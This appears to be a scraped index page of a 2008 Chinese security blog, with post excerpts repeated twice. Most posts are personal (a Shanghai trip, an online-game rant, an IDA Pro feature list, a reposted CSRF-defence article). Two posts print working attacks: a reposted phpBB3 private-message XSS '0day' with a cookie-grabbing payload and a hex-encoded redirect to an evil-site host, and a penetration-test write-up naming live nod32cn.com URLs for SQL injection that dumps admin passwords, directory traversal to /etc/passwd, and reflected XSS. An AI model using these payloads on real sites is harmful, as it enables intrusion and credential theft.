做了一回伪歌迷~
作者:ZhaoHuAn 日期:2008-09-22
感谢朋友爱情证书和百度娱乐杨嘉~
逛街·随手拍的~
作者:ZhaoHuAn 日期:2008-09-22
@上海
作者:ZhaoHuAn 日期:2008-09-14
回北京几天了,整理一下上海行的照片,因此行主要不是在玩,所以只去了城隍庙&外滩这一片,为避免日后懒惰荒于梳理,借假期三天——中秋佳节之际BLOG一下。
到上海的飞机晚点,刚下飞机就匆忙打车到公司(前面省略排队候车20分钟#-_-!!),天公不作美,大暴雨,路上的积水将近20厘米厚,南方就是这么滋润啊,让我顿时倍感亲切:O 司机师傅说星期五很多公司提早下班或者不上班,又下雨,交通一定是非常之堵。印象中是很久很久才到公司,司机师傅又把3号楼错认为是第3期楼,后来san哥跟我说原来SystEm32来的时候貌似也停这里,所以我一直怀疑是不是跟SystEm32坐的一辆车。。
san哥打着伞在门口接我,挖,终于见到崇拜已久的san师傅了,穿着nsfocus的黑色T恤,因为san哥素来低调,就不描述太多以免被K,膜拜一下 ^.^ 进了会议室后san哥拿了些巧克力和饼干给我,因为中午在飞机上随便吃了点,旅途劳累啊,还真有点饿了:P 然后就是久仰的cnhawk师傅,就跟他聊起天来,而且我发现cnhawk师傅是跟谁聊都能让对方觉得非常开心的,HOHO。面试的时候SystEm32来了,32是一个很好的兄弟,只比我大三岁,但技术功底非常扎实,用CC总的话说,技术很好,小伙子很帅,呵呵,崇拜啊。。认识了一个很好的兄弟:)
晚上部门领导请大家吃饭,……省略N字,平时很少喝酒,不胜酒力啊。。。Orz(算是明白32为什么有意要加强喝酒训练了) 晕忽忽的跟san哥回家了,就记得打车时等了很久都不等不到。
这些天都住在san哥家,还是复式的房子,很宽敞,一个精致的小楼梯通2层,我自己住一间,很舒服,哈哈,有机会上楼梯看看,san哥和嫂子很照顾我又很客气,真的觉得很不好意思,早知道星期一过来就好了,给san哥夫妇添了不少麻烦啊..
&...
到上海的飞机晚点,刚下飞机就匆忙打车到公司(前面省略排队候车20分钟#-_-!!),天公不作美,大暴雨,路上的积水将近20厘米厚,南方就是这么滋润啊,让我顿时倍感亲切:O 司机师傅说星期五很多公司提早下班或者不上班,又下雨,交通一定是非常之堵。印象中是很久很久才到公司,司机师傅又把3号楼错认为是第3期楼,后来san哥跟我说原来SystEm32来的时候貌似也停这里,所以我一直怀疑是不是跟SystEm32坐的一辆车。。
san哥打着伞在门口接我,挖,终于见到崇拜已久的san师傅了,穿着nsfocus的黑色T恤,因为san哥素来低调,就不描述太多以免被K,膜拜一下 ^.^ 进了会议室后san哥拿了些巧克力和饼干给我,因为中午在飞机上随便吃了点,旅途劳累啊,还真有点饿了:P 然后就是久仰的cnhawk师傅,就跟他聊起天来,而且我发现cnhawk师傅是跟谁聊都能让对方觉得非常开心的,HOHO。面试的时候SystEm32来了,32是一个很好的兄弟,只比我大三岁,但技术功底非常扎实,用CC总的话说,技术很好,小伙子很帅,呵呵,崇拜啊。。认识了一个很好的兄弟:)
晚上部门领导请大家吃饭,……省略N字,平时很少喝酒,不胜酒力啊。。。Orz(算是明白32为什么有意要加强喝酒训练了) 晕忽忽的跟san哥回家了,就记得打车时等了很久都不等不到。
这些天都住在san哥家,还是复式的房子,很宽敞,一个精致的小楼梯通2层,我自己住一间,很舒服,哈哈,有机会上楼梯看看,san哥和嫂子很照顾我又很客气,真的觉得很不好意思,早知道星期一过来就好了,给san哥夫妇添了不少麻烦啊..
&...
[ZZ]防止CSRF攻击
作者:ZhaoHuAn 日期:2008-09-04
转一篇不错的文章,不是很新,有些地方可以看一看:)
《防止CSRF攻击》
译者:韩国峰
本文已经获得原作者Email授权----译者注
概览:
1. Hello World
2. 介绍
3. 关于认证技术
3.1 Cookies Hashing
3.2 HTTP来路
3.3 验证码
4. 一次性令牌
5. 最后的话
1.Hello World
欢迎来到崭新的Playhack.net的新季度开题项目报告。我非常高兴您能够再次回来让我们的c001项目重现。
希望您能喜欢这个新的短篇论文,我邀请你浏览位于http://www.playhack.net的全部新项目。
开始:几乎没有什么,只是一点香烟!:
呐喊:我向我的playhack m8s null,omni,god and emdel,ofc o str0ke大声呐喊!NEX 回来了。
2.介绍
我 对跨站请求伪造(Cross Site Request Forgery,即CSRF)技术有一定研究,但是对网站开发者应当采取的措施研究不深。这些日子在编写一个对用户和管理员(这些人对他们的任务并不明 晰:P)有高度安全要求的分布式网站程序时,我被这个话题深刻的纠缠了。
针对这种情况,我必须考虑程序最终可能受到的各个方面的可能的攻击威胁。
给我最多麻烦的就是Session欺骗(或者CSRF,你可以按照自己喜欢的方式称呼),因为这种攻击是完全以用户的身份,因此并没有百分百的可能性来防止它。
如果你对我刚才说所的Session欺骗并不太了解,那么你可以阅读:http://www.playhack.net/view.php?id=30
3.可行措施
Ok,从这里开始,我必须假定你对Session欺骗攻击的实施方法已经深刻领会了:P
让我们开始新的继续。
考虑到一个已经登录到网站的受信用户可以完成一些重要的或者私密的操作,攻击者尝试记性一个可能的登录攻击(但是...
《防止CSRF攻击》
译者:韩国峰
本文已经获得原作者Email授权----译者注
概览:
1. Hello World
2. 介绍
3. 关于认证技术
3.1 Cookies Hashing
3.2 HTTP来路
3.3 验证码
4. 一次性令牌
5. 最后的话
1.Hello World
欢迎来到崭新的Playhack.net的新季度开题项目报告。我非常高兴您能够再次回来让我们的c001项目重现。
希望您能喜欢这个新的短篇论文,我邀请你浏览位于http://www.playhack.net的全部新项目。
开始:几乎没有什么,只是一点香烟!:
呐喊:我向我的playhack m8s null,omni,god and emdel,ofc o str0ke大声呐喊!NEX 回来了。
2.介绍
我 对跨站请求伪造(Cross Site Request Forgery,即CSRF)技术有一定研究,但是对网站开发者应当采取的措施研究不深。这些日子在编写一个对用户和管理员(这些人对他们的任务并不明 晰:P)有高度安全要求的分布式网站程序时,我被这个话题深刻的纠缠了。
针对这种情况,我必须考虑程序最终可能受到的各个方面的可能的攻击威胁。
给我最多麻烦的就是Session欺骗(或者CSRF,你可以按照自己喜欢的方式称呼),因为这种攻击是完全以用户的身份,因此并没有百分百的可能性来防止它。
如果你对我刚才说所的Session欺骗并不太了解,那么你可以阅读:http://www.playhack.net/view.php?id=30
3.可行措施
Ok,从这里开始,我必须假定你对Session欺骗攻击的实施方法已经深刻领会了:P
让我们开始新的继续。
考虑到一个已经登录到网站的受信用户可以完成一些重要的或者私密的操作,攻击者尝试记性一个可能的登录攻击(但是...
二版科技寄来的NOD32安全套装
作者:ZhaoHuAn 日期:2008-08-22
XSS Private Messagging On PhpBB3(0day)
作者:ZhaoHuAn 日期:2008-08-18
################################################## ####################################
# #
# Authors: Dante90, WaRWolFz Crew #
# T0T4L, Ex Member Crew #
# Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# Description: XSS (Cross Site Scripting), Grab Status: 100%. #
# #
################################################## ####################################
XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8]
程序代码
Where is:
程序代码
Redirect Code [Ascii --> Hex]:
程序代码
# #
# Authors: Dante90, WaRWolFz Crew #
# T0T4L, Ex Member Crew #
# Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# Description: XSS (Cross Site Scripting), Grab Status: 100%. #
# #
################################################## ####################################
XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8]
程序代码http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=6779
Where is:
程序代码[xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))}
Redirect Code [Ascii --> Hex]:
程序代码[xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74...
nod32官方web渗透测试
作者:ZhaoHuAn 日期:2008-08-16
前几天Ntsill叫我帮忙看看nod32官方站点,最近他们在负责这个,呵呵,简单测试了一下还是存在一些问题的
SQL注入:
管理员密码就爆出来了
程序代码
程序代码
Directory traversal:
http://www.nod32cn.com:80/virus.php?prefix=../../../../../../../../etc/passwd%00.html
default.php searchword
virus.php 过滤不严导致的跨站
XSS:
程序代码
程序代码
SQL注入:
管理员密码就爆出来了
程序代码http://www.nod32cn.com:80/default.php?aid=1+and+1=2+union+all+select+concat(username,char(58),password),2+from+manager--&p=2&id=86
程序代码http://www.nod32cn.com:80/VisualizeShop.php?vid=7+and+1%3D0&action=Edit
Directory traversal:
http://www.nod32cn.com:80/virus.php?prefix=../../../../../../../../etc/passwd%00.html
default.php searchword
virus.php 过滤不严导致的跨站
XSS:
程序代码http://www.nod32cn.com:80/virus.php?prefix=>"><ScRiPt%20%0a%0d>alert(/xss/)%3B</ScRiPt>
程序代码http://www.nod32cn.co...
IDA Pro 5.3 feature list
作者:ZhaoHuAn 日期:2008-07-17
IDA Pro 5.3 feature list
New and improved debugger
The previous version of IDA Pro did not add anything to the debugger and we felt it is time for changes. We reimplemented the debugger core and improved the debugger modules.
The new debugger is more efficient and has better support for multithreaded applications. Breakpoint handling is faster, more logical and less deadlocking. Exception handling is more user friendly.
The debugger servers are multithreaded: they can handle multiple debug sessions, no need to kill a hung server or run multiple copies.
Debugger modules
We added two new debugger targets:
iPhone debugger. Click here for the details.
Symbian OS debugger. Click here for the details.
We publish the source code of all debugger modules.
The Linux debugger module has been improved to support multithreaded applications. We support NPTL based kernels.
Better analysis for PC and ARM...
New and improved debugger
The previous version of IDA Pro did not add anything to the debugger and we felt it is time for changes. We reimplemented the debugger core and improved the debugger modules.
The new debugger is more efficient and has better support for multithreaded applications. Breakpoint handling is faster, more logical and less deadlocking. Exception handling is more user friendly.
The debugger servers are multithreaded: they can handle multiple debug sessions, no need to kill a hung server or run multiple copies.
Debugger modules
We added two new debugger targets:
iPhone debugger. Click here for the details.
Symbian OS debugger. Click here for the details.
We publish the source code of all debugger modules.
The Linux debugger module has been improved to support multithreaded applications. We support NPTL based kernels.
Better analysis for PC and ARM...
Looooooong time no update:)
作者:ZhaoHuAn 日期:2008-07-16
确实又是两个多月没有更新了……
从在mifor师傅的blog转移到这里,我开始相信,过多依赖网络,还真会使灵感走向枯竭,思维模式也慢慢改变,离以前的那个自己越来越远。从以前的每天更新到现在,我已经认为,我是个不适合写的人,甚至一些很有想法的时候,也不想在BLOG上表现出来,看着每天不少的朋友光临,关注着我的朋友,还有申请连接的朋友,心中还是有些XX(词穷了),还有abu师傅,我知道这个空间其实远远不只当初的那几百M了 ^.^
从5月百度面试回来到现在,好象也没变什么,依旧还是那样,偶尔做一做知识整理,看看聚合,关心一下最近业界出了什么新闻,什么地方出了哪些安全问题,存在的安全隐患,新的漏洞。。只是,研究的时间少了,真的感觉自己,慢慢离安全这个话题越来越远,但是CC总说得对,走得多远还是得看自己。
最近刺发了一期的百度XSS,看了一下,还有我报过的几个,呵呵,从上次百度的面试中,其实也发现了这个问题,百度对WEB安全实在是很不重视,记得有几个XSS我还是直接报给相关人员的,一直到现在也没有补。还记得Dr.Li问我的几个WEB安全问题,也只是很轻描淡写的几句。我那时后在想,百度上次那个worm就没什么好说的了,而且临时挖就能找到一堆XSS。以至于现在刺暴出一系列XSS问题,我一点也不觉得吃惊。
不过兄弟们能去百度的话还是很好的,这段时间百度对安全还是相当的重视,而且web安全方面缺乏相关的人才,特别是应届毕业在百度的待遇在业界都很有竞争力,而且去的时候最好是系统部的Doctor Li面,他是一位知识渊博且很有亲和力和谦虚的人,在他面前你无需感到紧张 不过建议去的同学还是要加强其他方面的知识,尤其是linux和程序方面、安全编码经验等,做好充分的准备 :)
再过一年就毕业了,目前的想法是在北京工作,今天在这里BLOG一下,希望明年回头看到这些年走来的路,能够倍感欣慰。还是要感谢xundi师傅,cc总,ben总,nuke师...
从在mifor师傅的blog转移到这里,我开始相信,过多依赖网络,还真会使灵感走向枯竭,思维模式也慢慢改变,离以前的那个自己越来越远。从以前的每天更新到现在,我已经认为,我是个不适合写的人,甚至一些很有想法的时候,也不想在BLOG上表现出来,看着每天不少的朋友光临,关注着我的朋友,还有申请连接的朋友,心中还是有些XX(词穷了),还有abu师傅,我知道这个空间其实远远不只当初的那几百M了 ^.^
从5月百度面试回来到现在,好象也没变什么,依旧还是那样,偶尔做一做知识整理,看看聚合,关心一下最近业界出了什么新闻,什么地方出了哪些安全问题,存在的安全隐患,新的漏洞。。只是,研究的时间少了,真的感觉自己,慢慢离安全这个话题越来越远,但是CC总说得对,走得多远还是得看自己。
最近刺发了一期的百度XSS,看了一下,还有我报过的几个,呵呵,从上次百度的面试中,其实也发现了这个问题,百度对WEB安全实在是很不重视,记得有几个XSS我还是直接报给相关人员的,一直到现在也没有补。还记得Dr.Li问我的几个WEB安全问题,也只是很轻描淡写的几句。我那时后在想,百度上次那个worm就没什么好说的了,而且临时挖就能找到一堆XSS。以至于现在刺暴出一系列XSS问题,我一点也不觉得吃惊。
不过兄弟们能去百度的话还是很好的,这段时间百度对安全还是相当的重视,而且web安全方面缺乏相关的人才,特别是应届毕业在百度的待遇在业界都很有竞争力,而且去的时候最好是系统部的Doctor Li面,他是一位知识渊博且很有亲和力和谦虚的人,在他面前你无需感到紧张 不过建议去的同学还是要加强其他方面的知识,尤其是linux和程序方面、安全编码经验等,做好充分的准备 :)
再过一年就毕业了,目前的想法是在北京工作,今天在这里BLOG一下,希望明年回头看到这些年走来的路,能够倍感欣慰。还是要感谢xundi师傅,cc总,ben总,nuke师...
XSS Related
作者:ZhaoHuAn 日期:2008-05-11
From my over sized Firefox scrapbook and draft queue cleanup:
http://mybeni.rootzilla.de/mybeNi/2007/this_is_the_first_weblog_xss_worm/
http://www.seo-blackhat.com/xss-cheat-sheet/
http://www.owasp.org/index.php/Main_Page
http://mybeni.rootzilla.de/mybeNi/2007/this_is_the_first_weblog_xss_worm/
http://www.seo-blackhat.com/xss-cheat-sheet/
http://www.owasp.org/index.php/Main_Page
[zt]史上最垃圾的网游
作者:ZhaoHuAn 日期:2008-05-11
史上最垃圾的网游
见过15秒重新进入一次游戏,2分钟服务器重新启动一次的网游吗?
——没见过就去玩《欲望――龙之故乡》吧
你见过,封顶350级,只要有钱,一下午就能升到250级的网游吗?
——没见过就去玩《命运2》吧
你见过官网和私服同步更新的网游吗?
——没见过就去玩《奇迹》吧
你见过日日夜夜练了4年也没升49级网游吗?
——没见过就去玩《热血传奇》吧
你见过宣传做的吓死人,一年就倒闭的网游吗?
——没见过就去就怀念《A3》吧
你见过推出半年就倒闭的网游吗?
——没见过就去怀念《绝对女神》吧
你见过内测有100多人,公测最高56人在线的网游吗?
——没见过就去玩《飙车》吧
你见过每天卖特价包、高等级道具,最后代理公司跑人的网游吗?
——没见过就去玩《龙族》吧
你见过每天喊国产巨作的网游,里面NPC造型和店面牌匾全是日文的网游吗?
——没见过就去玩《QQ幻想》吧
你见过维护之后就出BUG,出完再临时维护,维护完再出BUG再维护的网络游戏吗? ——没见过就来《封神榜》吧!
你见过跑路跑一半被路边灯柱卡住,搞得像被栓住的狗一样,不得不退出再进的 游戏吗? ——没见过就去玩<数码精灵>吧
你见过封测1千多人`二测800多人三测不足500人的游戏嘛?
——没见过就去玩QQ三国吧
你见过官方自己卖外挂的网游吗?
——没见过就去玩《石器》吧
你见过用金山游侠之类的单机游戏修改器能修改属性的网游吗?
——没见过就去玩《精灵》吧
你见过高唱永久免费 ,其实XXX免费比收费还要贵的游戏吗? - ――-没见过就去玩<征途>
你见过高唱民族游戏、自主开发,其实抄袭;高唱永久免费,其实N多地图都高价收费;高唱密宝帐号万无一失,其实高价买个不保的垃圾;高唱为玩家着想,其实是个无耻的骗子、吸血鬼,只会欺骗玩家,只想尽办法赚钱,不...
见过15秒重新进入一次游戏,2分钟服务器重新启动一次的网游吗?
——没见过就去玩《欲望――龙之故乡》吧
你见过,封顶350级,只要有钱,一下午就能升到250级的网游吗?
——没见过就去玩《命运2》吧
你见过官网和私服同步更新的网游吗?
——没见过就去玩《奇迹》吧
你见过日日夜夜练了4年也没升49级网游吗?
——没见过就去玩《热血传奇》吧
你见过宣传做的吓死人,一年就倒闭的网游吗?
——没见过就去就怀念《A3》吧
你见过推出半年就倒闭的网游吗?
——没见过就去怀念《绝对女神》吧
你见过内测有100多人,公测最高56人在线的网游吗?
——没见过就去玩《飙车》吧
你见过每天卖特价包、高等级道具,最后代理公司跑人的网游吗?
——没见过就去玩《龙族》吧
你见过每天喊国产巨作的网游,里面NPC造型和店面牌匾全是日文的网游吗?
——没见过就去玩《QQ幻想》吧
你见过维护之后就出BUG,出完再临时维护,维护完再出BUG再维护的网络游戏吗? ——没见过就来《封神榜》吧!
你见过跑路跑一半被路边灯柱卡住,搞得像被栓住的狗一样,不得不退出再进的 游戏吗? ——没见过就去玩<数码精灵>吧
你见过封测1千多人`二测800多人三测不足500人的游戏嘛?
——没见过就去玩QQ三国吧
你见过官方自己卖外挂的网游吗?
——没见过就去玩《石器》吧
你见过用金山游侠之类的单机游戏修改器能修改属性的网游吗?
——没见过就去玩《精灵》吧
你见过高唱永久免费 ,其实XXX免费比收费还要贵的游戏吗? - ――-没见过就去玩<征途>
你见过高唱民族游戏、自主开发,其实抄袭;高唱永久免费,其实N多地图都高价收费;高唱密宝帐号万无一失,其实高价买个不保的垃圾;高唱为玩家着想,其实是个无耻的骗子、吸血鬼,只会欺骗玩家,只想尽办法赚钱,不...
